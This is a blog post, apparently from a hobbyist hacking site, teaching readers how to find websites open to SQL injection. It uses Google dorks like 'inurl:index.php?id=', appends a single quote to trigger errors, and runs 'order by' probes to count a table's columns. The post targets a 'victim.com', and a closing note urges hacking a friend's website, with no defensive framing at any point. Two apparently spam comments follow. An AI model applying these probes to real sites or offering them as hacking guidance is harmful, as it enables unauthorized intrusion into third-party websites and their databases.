How to Find a vulnerable website?

Posted by ADMIN On 7:19 AM
 Google is best friend for Hackers. We can find the Vulnerable website using google search. This is known as Google Dorks.

Small List of Google Dork:
inurl:index.php?id=

inurl:gallery.php?id=

inurl:post.php?id=

inurl:article?id=


Download A large list of Google dork from here

copy one from above list and paste in google search box,hit enter

You can see list of websites ending with that url for eg:

    http://www.victim.com/index.php?id=2


Go to that link.

add ' (single quote) at the end of the url.
For eg:
http://www.victim.com/index.php?id=2'

Now hit enter.

if the page remains in the same page,then it is not vulnerable website.
If the page show any error or show blank page, then it is vulnerable website.

Now let's check further.

Remove single quote from url
Then add this "order by x" (without quotes)
replace the x with 0,1,2,....n.(until it show error page).

For Eg:
http://www.victim.com/index.php?id=2 order by 1 (no error)
http://www.victim.com/index.php?id=2 order by 2 (no error)
http://www.victim.com/index.php?id=2 order by 3 (no error)
http://www.victim.com/index.php?id=2 order by 4 (no error)
http://www.victim.com/index.php?id=2 order by 5(error)

Now you can come to one conclusion is that website has 4 columns.
Also it is vulnerable.

If the above method is not working,then try this:
http://www.victim.com/index.php?id=2 order by 1-- (no error)
http://www.victim.com/index.php?id=2 order by 2-- (no error)
http://www.victim.com/index.php?id=2 order by 3-- (no error)
http://www.victim.com/index.php?id=2 order by 4-- (no error)
http://www.victim.com/index.php?id=2 order by 5--(error)

If this is also not working,then try this:

http://www.victim.com/index.php?id=2 and 1=2 order by 1-- (no error)
http://www.victim.com/index.php?id=2 and 1=2 order by 2-- (no error)
http://www.victim.com/index.php?id=2 and 1=2 order by 3-- (no error)
http://www.victim.com/index.php?id=2 and 1=2 order by 4-- (no error)
http://www.victim.com/index.php?id=2 and 1=2 order by 5--(error)


Note:
  if you want to hack particular website like www.yourfriendwebsite.com, then go to that website. Find the
  webpage that ends with any of google dorks list items.

2 Response to "How to Find a vulnerable website?"

  1. Anonymous Said,

    Thanks for finally talking about > "How to Find a vulnerable website?"
    < Loved it!
    My web-site ... immobilienalanya.net

     

  2. Unknown Said,

    Usually I never comment on blogs but your article is so convincing that I never stop myself to say something about it. You’re doing a great job Man, I like it..wordpress database errors..Keep it Up!Keep it up.

     

Post a Comment

Google Translator

Search Box

Blog Archive

User Status

Free counters!

About Me

ADMIN
Pakistan
View my complete profile

Recent Posts

Recent Comments